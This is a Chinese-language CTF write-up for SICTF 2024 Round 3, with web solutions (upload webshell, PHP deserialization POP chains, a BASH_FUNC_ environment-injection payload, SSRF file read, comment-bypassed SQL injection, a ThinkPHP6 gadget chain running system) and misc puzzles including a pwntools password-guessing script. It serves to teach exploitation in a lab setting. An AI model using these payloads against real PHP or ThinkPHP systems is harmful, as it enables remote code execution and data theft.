SICTF2024_Round#3

WEB

100%_upload

知识点:文件上传+文件包含

首先上传一个正常图片,抓包,在图片结尾写入一句话木马,记得用php短标签,因为正常<?php被过滤了

image-20240216092458112

看到上传成功,用文件包含进行访问

image-20240216092534352

SICTF{92b96c29-5377-41da-b4c9-0334769ee6ea}

Not just unserialize

知识点:php反序列化和putenv函数漏洞

putenv函数漏洞可以参考https://pankas.top/2023/03/06/3%E6%9C%88%E5%88%9D%E6%AF%94%E8%B5%9B%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/#Babyweb

payload

<?php

// Show this file's own source to the visitor (common for a CTF challenge page).
highlight_file(__FILE__);
class start
{
public $welcome;//SE
public $you;
// Entry point of the chain: runs automatically when the object is destroyed,
// which includes objects produced by unserialize() of untrusted data.
public function __destruct()
{
$this->begin0fweb();
}
// Writes to $this->welcome->you. When $welcome holds an object that does not
// declare a `you` property (SE below declares only $year), that object's
// __set() is invoked instead of a plain assignment.
public function begin0fweb()
{
$p='hacker!';
$this->welcome->you = $p;
}
}

class SE{
public $year;//CR
// Magic setter: fires for any write to an undeclared property (see
// start::begin0fweb()). echo of an object calls its __toString(), so when
// $year holds a CR the chain continues in CR::__tostring().
public function __set($name, $value){
echo ' Welcome to new year! ';
echo($this->year);
}
}

class CR {
public $last;//ET
public $newyear;//\nworries

// Reached when SE::__set() echoes a CR stored in $year.
public function __tostring() {

if (is_array($this->newyear)) {
echo 'nonono';
return false;
}
// Case-insensitive and unanchored: matches "worries" anywhere in the value,
// including after a newline.
if (!preg_match('/worries/i',$this->newyear))
{
echo "empty it!";
return 0;
}

// Anchored with ^...$ and without the /s or /m modifier: `.` does not match a
// newline, so a value such as "\nworries" (see the payload below) passes the
// check above but fails this one and falls into the else branch.
if(preg_match('/^.*(worries).*$/',$this->newyear)) {
echo 'Don\'t be worry';
} else {
echo 'Worries doesn\'t exists in the new year ';
// empty() on an undeclared property of an object calls that object's
// __isset(); with $last holding an ET this reaches ET::__isset().
empty($this->last->worries);
}
return false;
}
}

class ET{

// Magic isset: reached through empty() on an undeclared property (see
// CR::__tostring()). Both the variable name and the value handed to putenv()
// come straight from the request, so the sender controls the environment of
// the system() call that follows. Defensive fix: never build putenv()
// arguments from request data, and do not spawn a shell with a request-shaped
// environment at all.
public function __isset($name)
{
foreach ($_GET['get'] as $inject => $rce){
putenv("{$inject}={$rce}");
}
system("echo \"Haven't you get the secret?\"");
}
}
// Assemble the chain start -> SE -> CR -> ET described above and print the
// serialized object base64-encoded. $newyear starts with a newline on purpose:
// it satisfies the first regex in CR::__tostring() and fails the anchored one.
$et=new ET();
$cr=new CR();
$se=new SE();
$Start=new start();
$cr->last=$et;
$cr->newyear="\nworries";
$se->year=$cr;
$Start->welcome=$se;
$Start->you='qetx';
echo base64_encode(serialize($Start));
?>
?get[BASH_FUNC_echo%%]=()%20{%20cat%20/f*;%20}

image-20240216162849766

SICTF{5acfa15e-e9a8-4106-aa38-4ed79dce9354}

EZ_SSRF

出题人骗人说flag在/flag下

<?php
highlight_file(__file__);
// Silences every PHP error and warning, so a failed curl request or an invalid
// URL below produces no diagnostic output.
error_reporting(0);
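/**
 * Fetch $url with curl, echo the body base64-encoded and return it.
 *
 * $url arrives through a property of an unserialized object (see
 * client::__destruct()), i.e. it must be treated as untrusted. curl accepts
 * every protocol it was built with by default (file://, gopher://, dict://,
 * ...), which is what turns a fetch helper into SSRF / local file read. The
 * protocol allow-list below limits both the initial request and any redirect
 * target to http(s). Requests to internal hosts over http remain possible; a
 * host allow-list would be needed to close that as well.
 *
 * @param string $url
 * @return string|false response body, or false when the request failed
 */
function get($url) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    // Only http/https, for the request itself and for any Location target.
    curl_setopt($curl, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($curl, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    $data = curl_exec($curl);
    curl_close($curl);
    // curl_exec() returns false on failure; do not feed that to base64_encode().
    if ($data === false) {
        return false;
    }
    echo base64_encode($data);
    return $data;
}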
class client{
public $url;
public $payload;
// NOTE(review): these assignments target locals, not $this->url and
// $this->payload, so both properties are still null after construction. The
// literal string assigned to $payload is never evaluated anywhere in this file.
public function __construct()
{
$url = "http://127.0.0.1/";
$payload = "system(\"cat /flag\");";
echo "Exploit";
}
// Runs on object destruction -- including for objects produced by
// unserialize() -- and fetches whatever $url holds. Any code path that
// unserialize()s request data therefore lets the sender choose the URL passed
// to get(). Network I/O in a destructor is the design flaw to remove.
public function __destruct()
{
get($this->url);
}
}
// Build the object, point it at a local file and round-trip it through
// serialize()/unserialize(). The unserialized copy is not kept, so its
// __destruct() runs immediately and calls get(); $Client's own __destruct()
// fires again at script end. The serialized string itself is printed last.
$Client=new client();
$Client->url="file:///var/www/html/flag.php";
$exp=serialize($Client);
unserialize($exp);
echo $exp;
?>

O:6:"client":2:{s:3:"url";s:29:"file:///var/www/html/flag.php";s:7:"payload";N;}

image-20240219152039294

将输出的 base64 字符串拿去解码

image-20240219152108044

hacker

SQL注入,过滤了空格和一些关键字

题目告诉了表,用无列名注入,参考笔记https://blog.csdn.net/weixin_46330722/article/details/109605941

payload

flag'/**/union/**/select/**/group_concat(`2`)/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)n%23

image-20240219154129391

Oyst3rPHP

先用/www.zip路由下载源码,因为网站有“RT,一个很简单的Web”的前端显示,所以为了找到源码,在phpstorm中用shift+ctrl+f在整个项目中搜索“RT,一个很简单的Web”出现的位置,得到了如下的源码

ublic function index()
{
echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
echo "<img src='../Oyster.png'"."/>";


$payload = base64_decode(@$_POST['payload']);
$right = @$_GET['left'];
$left = @$_GET['right'];

$key = (string)@$_POST['key'];
// Gate 1: loose (==) comparison of two md5 hex strings. Digests of the form
// "0e<digits>" compare equal as numeric strings, so two different inputs can
// pass. Use === (or hash_equals()) for the comparison instead.
if($right !== $left && md5($right) == md5($left)){

echo "Congratulations on getting your first oyster";
echo "<img src='../Oyster1.png'"."/>";

// Gate 2: preg_match() returns false (not 0) when the backtrack limit is hit
// on a very long $key; false is falsy, so die() is skipped. Test for `=== 1`
// and check preg_last_error() rather than relying on truthiness.
if(preg_match('/.+?THINKPHP/is', $key)){
die("Oysters don't want you to eat");
}
if(stripos($key, '603THINKPHP') === false){
die("!!!Oysters don't want you to eat!!!");
}

echo "WOW!!!Congratulations on getting your second oyster";
echo "<img src='../Oyster2.png'"."/>";

// Gate 3: unserialize() of request-controlled data; the @ hides any notice it
// raises. Untrusted input should go through json_decode() instead, or at the
// very least unserialize() with an allow-list in the allowed_classes option.
@unserialize($payload);
// The last oyster is in the root directory and it contains the Flag??? How do you find it??? What is its name???
// A comment somewhere in the source gives the hint -- this tests whether you really know the Oyst3rphp framework!!!
// Small tip: the "细狗" (skinny dog) function ┗|`O′|┛ awoo~~
}
}

可以知道先要进行MD5绕过,然后是preg_match最大回溯绕过,最后是thinkphp的反序列化漏洞。查看源码中的readme文件,发现thinkphp是6版本,于是上网查thinkphp6反序列化漏洞,得到poc

<?php
namespace think\model\concern;

// Minimal stand-in for the framework trait of the same name: only the
// properties that must appear in the serialized object are declared. $data
// carries the command string and $withAttr the callable name that, per the
// writeup, the target's model code ends up applying to it.
trait Attribute{
private $data=['jiang'=>['jiang'=>'cat /Oyst3333333r.php']];
private $withAttr=['jiang'=>['jiang'=>'system']];
protected $json=["jiang"];
protected $jsonAssoc = true;
}
// Stand-in for the framework's ModelEvent trait; $withEvent is set to false in
// Model::__construct() below.
trait ModelEvent{
protected $withEvent;
}

namespace think;

// Local copy of think\Model declaring only the properties needed so that
// serialize() emits the same class name and private/protected property names
// the target deserializes (per the writeup, the real framework class is what
// runs on the server).
abstract class Model{
use model\concern\Attribute;
use model\concern\ModelEvent;
private $exists;
private $force;
private $lazySave;
protected $suffix;


// $a is stored as $suffix; the generator below passes a nested Pivot here.
function __construct($a = '')
{
$this->exists = true;
$this->force = true;
$this->lazySave = true;
$this->withEvent = false;
$this->suffix = $a;
}
}

namespace think\model;

use think\Model;

// Concrete subclass so the abstract Model can be instantiated and serialized.
class Pivot extends Model{}

// Serialize a Pivot whose $suffix is itself a Pivot and print it base64-encoded;
// this is the value posted as `payload` by the Python script below.
echo base64_encode(serialize(new Pivot(new Pivot())));
?>

最后用python直接打

import requests
# Challenge endpoint. left/right are two different strings whose md5 digests
# compare equal under PHP's loose == (gate 1 in index()).
url="http://yuanshen.life:39920?left=QNKCDZO&right=s878926199a"
# key: the very long prefix pushes preg_match() past its backtrack limit (gate 2)
#      while the value still contains the required '603THINKPHP' substring.
# payload: the base64-encoded serialized object produced by the PHP generator
#      above (the value is elided in this copy of the page).
pay={"key":1000100*"a"+"603THINKPHP","payload":"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"}
res=requests.post(url,data=pay)
print(res.text)

image-20240220181209029

MISC

真💨签到

给了一个加密的zip文件,用010打开发现文件末尾附加了一段16进制字符,先进行16进制解码

image-20240219154336587

image-20240219154356825

后面提示给了文本解密

再去进行文本解密

image-20240219154449307

得到密码去解密文件,得到一个wav文件和一个steg.jpg,对wav文件进行频谱分析,得到

image-20240219154614689

再根据wav文件名“LagrangeisCapatlized”猜测lagrange要大写,然后用steghide去解密steg.jpg

image-20240219155424700

GeekChallege

import string
import time
from pwn import *

#context.log_level="debug"

# Character-by-character recovery of a 113-character password. The check below
# assumes the service answers with one '1' per correct leading character
# (inferred from the `'1'*(len(pwd)+1) in a` test -- confirm against the service).
p = remote("yuanshen.life",39600)
dic=string.printable
p.recvuntil('>')  # wait until the '>' prompt is seen before sending input
pwd = ""          # password recovered so far
pwdlen = 113      # total length of the password
lst=""            # characters already confirmed at least once
for i in range(114):
    print(i,pwd)
    for j in dic:
        # pad with '0' so every guess has the full length
        payload = pwd + j + '0'*(pwdlen-len(pwd))
        p.sendline(payload)
        a = p.recvuntil('\n').decode()
        # one more '1' than before means j is correct at this position
        if '1'*(len(pwd)+1) in a:
            print(a)
            if j not in lst:
                lst += j
                dic = j + dic  # try already-confirmed characters first later on
            pwd += j
            break

p.interactive()  # hand the terminal over to the user

神秘的流量

img

用脚本解密

img

得到raw key

拿key去解密流量包,但是cs-parse-http-traffic.py脚本要稍微改一下

img

然后去解密

img

img

who?who?who?

根据提示压缩包密码为6位小写字母,去爆破

image-20240223172458801

得到一个txt文件,看起来很像零宽隐写

image-20240223173024545

去在线网站解密https://yuanfux.github.io/zero-width-web/

image-20240223173039947

得到

U2FsdGVkX19uvldJ6CGUNff3B28QEdIjZqgUh98K+/0J16ELU8WVQydohw4P5+2M
jbhTLQHNOpcoOd7kSRgy8pwpovCmimdD8M0IbYUeXjNKYePL/WP4PCMaOJHAW3HR
b7IEoDDH1NYh3o5NwMmcFEqy1ujf72VgQIQkaeYFFFE=

猜测可能是Rabbit,去在线网站解密https://www.sojson.com/encrypt_rabbit.html

密码给了提示:树木是渣男,所以是shumu

image-20240223173243052

得到的明文像 DNA 编码,去解码

import sys

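# Codon -> character table: 64 triplets over A/C/G/T covering a-z, A-Z, 0-9,
# space and '.'.
mapping = {
    'AAA': 'a', 'AAC': 'b', 'AAG': 'c', 'AAT': 'd', 'ACA': 'e', 'ACC': 'f', 'ACG': 'g', 'ACT': 'h', 'AGA': 'i',
    'AGC': 'j', 'AGG': 'k', 'AGT': 'l', 'ATA': 'm', 'ATC': 'n', 'ATG': 'o', 'ATT': 'p', 'CAA': 'q', 'CAC': 'r',
    'CAG': 's', 'CAT': 't', 'CCA': 'u', 'CCC': 'v', 'CCG': 'w', 'CCT': 'x', 'CGA': 'y', 'CGC': 'z', 'CGG': 'A',
    'CGT': 'B', 'CTA': 'C', 'CTC': 'D', 'CTG': 'E', 'CTT': 'F', 'GAA': 'G', 'GAC': 'H', 'GAG': 'I', 'GAT': 'J',
    'GCA': 'K', 'GCC': 'L', 'GCG': 'M', 'GCT': 'N', 'GGA': 'O', 'GGC': 'P', 'GGG': 'Q', 'GGT': 'R', 'GTA': 'S',
    'GTC': 'T', 'GTG': 'U', 'GTT': 'V', 'TAA': 'W', 'TAC': 'X', 'TAG': 'Y', 'TAT': 'Z', 'TCA': '1', 'TCC': '2',
    'TCG': '3', 'TCT': '4', 'TGA': '5', 'TGC': '6', 'TGG': '7', 'TGT': '8', 'TTA': '9', 'TTC': '0', 'TTG': ' ',
    'TTT': '.'}


def decode_dna(string: str) -> str:
    """Decode a DNA-triplet (codon) encoded string.

    Runs of A/C/G/T are read three characters at a time and each codon is
    replaced by its entry in ``mapping``. Any other character (e.g. ``{``,
    ``_``, ``}``) is copied through unchanged, which keeps flag delimiters
    intact.

    Args:
        string: The encoded text.

    Returns:
        The decoded text.

    Raises:
        KeyError: if a codon is not in ``mapping`` or the input ends in a
            partial codon (fewer than three nucleotides).
    """
    pieces: list[str] = []
    i = 0
    length = len(string)
    while i < length:
        ch = string[i]
        if ch not in "ATCG":
            pieces.append(ch)
            i += 1
            continue
        codon = string[i:i + 3]
        try:
            pieces.append(mapping[codon])
        except KeyError:
            # Same exception type as a bare lookup, but with position information.
            raise KeyError(f"unknown or incomplete codon {codon!r} at offset {i}") from None
        i += 3
    # Join once instead of repeated string concatenation.
    return "".join(pieces)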


# Encoded text recovered from the Rabbit-decrypted ciphertext above; '{', '_'
# and '}' are not nucleotides and pass through decode_dna() unchanged.
input_string = "GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}"
print(decode_dna(input_string))

#SICTF{Q1A0_Q1A0_GA0_SU_N1_SHUMU_SH1_ZHA_NAN}

image-20240223175938921

